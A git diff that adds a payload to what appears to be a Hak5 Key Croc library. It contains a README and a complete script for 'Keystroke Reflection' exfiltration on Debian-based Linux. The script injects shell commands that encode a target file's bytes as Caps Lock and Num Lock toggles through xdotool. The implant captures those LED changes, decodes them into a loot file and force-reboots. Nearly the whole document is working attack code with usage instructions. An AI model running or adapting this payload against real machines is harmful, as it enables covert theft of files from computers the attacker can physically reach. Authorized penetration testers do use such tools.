diff --git a/payloads/library/exfiltration/lin_keystroke-reflection/README.md b/payloads/library/exfiltration/lin_keystroke-reflection/README.md new file mode 100644 index 0000000..5a50fe3 --- /dev/null +++ b/payloads/library/exfiltration/lin_keystroke-reflection/README.md @@ -0,0 +1,59 @@ +# "Linux" Keystroke Reflection + +- Title: "Linux" Keystroke Reflection +- Author: TW-D +- Version: 1.0 +- Target: Debian-Based Linux Distributions +- Category: Exfiltration +- Attackmode: HID + +## Description + +Implementation of the "Keystroke Reflection" technique for file exfiltration. + +The table below presents an estimation of the time taken for a specific number of bytes : + +| Bytes | Seconds (xdotool) | +| --- | --- | +| 5 | Between 10 and 15 | +| 10 | Between 20 and 25 | +| 100 | Between 220 and 230 | +| 1000 | Between 2250 and 2260 | + +__Note :__ *The target system must have "xxd" and "xdotool" installed.* + +## Configuration + +From the file "keystroke-reflection_exfiltration.txt" change the value of the following variable : +``` + +######## SETUP ######## + +LED SETUP + +export DUCKY_LANG="us" + +``` + +## Trigger + +> +> MATCH __kr:file=(.*?)\[ENTER\] +> + +## Usage + +The triggering must be done in a terminal. + +``` +:~$ hostname > /tmp/EXFIL +:~$ __kr:file=/tmp/EXFIL[ENTER] +``` + +**OR** + +``` +:~$ __kr:file=/etc/hostname[ENTER] +``` + +__Note :__ *After triggering, avoid using the keyboard.* diff --git a/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt b/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt new file mode 100644 index 0000000..2713a22 --- /dev/null +++ b/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt @@ -0,0 +1,119 @@ +#!/bin/bash +# +# Title: "Linux" Keystroke Reflection +# Description: +# Implementation of the +# "Keystroke Reflection" technique +# for file exfiltration. +# +# Author: TW-D +# Version: 1.0 +# Target: Debian-Based Linux Distributions +# Category: Exfiltration +# Attackmode: HID +# +# TESTED ON +# =============== +# Ubuntu 22.04.3 LTS with "Logitech Keyboard K120" +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# White fast blink ................................ CLEANUP +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH +# + +######## TRIGGER ######## + +MATCH __kr:file=(.*?)\[ENTER\] + +######## INITIALIZATION ######## + +readonly KR_FILE="$(echo "${LOOT}" | sed 's/\[[^]]*\]//g')" +readonly KR_BIN="/tmp/keystroke-reflection.bin" +readonly KEYCROC_LOOT="/root/loot/keystroke-reflection_$(date '+%s')-${RANDOM}" + +######## SETUP ######## + +LED SETUP + +export DUCKY_LANG="us" + +######## ATTACK ######## + +LED ATTACK + +QUACK STRING " binary_dump=\"\$(xxd -b ${KR_FILE} | cut -d' ' -f2-7)\";" +QUACK STRING " key_sequence=\"\";" +QUACK STRING " for ((i=0;i<\"\${#binary_dump}\";i++)); do" +QUACK STRING " if [ \"\${binary_dump:\$i:1}\" == \"0\" ]; then" +QUACK STRING " key_sequence+=\"Caps_Lock \";" +QUACK STRING " elif [ \"\${binary_dump:\$i:1}\" == \"1\" ]; then" +QUACK STRING " key_sequence+=\"Num_Lock \";" +QUACK STRING " fi;" +QUACK STRING " done;" +QUACK STRING " sleep 3;" +QUACK STRING " xdotool key --delay 275 \$key_sequence" +QUACK DELAY 250 +QUACK ENTER + +######## STAGE2 ######## + +LED STAGE2 + +loop_control="true" +capslock_state="$(CAPSLOCK_ON)" +numlock_state="$(NUMLOCK_ON)" + +while [ "${loop_control}" == "true" ]; do + start_time="$(date '+%s')" + while true; do + if [ "$(CAPSLOCK_ON)" != "${capslock_state}" ]; then + echo -n "0" >> "${KR_BIN}" + capslock_state="$(CAPSLOCK_ON)" + break + elif [ "$(NUMLOCK_ON)" != "${numlock_state}" ]; then + echo -n "1" >> "${KR_BIN}" + numlock_state="$(NUMLOCK_ON)" + break + elif [ $(($(date '+%s') - start_time)) -ge 9 ]; then + loop_control="false" + break + fi + done +done + +######## STAGE3 ######## + +LED STAGE3 + +if [ -f "${KR_BIN}" ]; then + for binary in $(cat "${KR_BIN}" | sed 's/\(.\{8\}\)/\1 /g'); do + decimal="$((2#${binary}))" + hexadecimal="$(printf "%X" "${decimal}")" + ascii="$(printf "\\x${hexadecimal}")" + echo -en "${ascii}" >> "${KEYCROC_LOOT}" + done + rm "${KR_BIN}" +fi + +######## CLEANUP ######## + +LED CLEANUP + +sync + +######## FINISH ######## + +LED FINISH + +ATTACKMODE OFF + +######## OFF ######## + +LED OFF + +reboot --force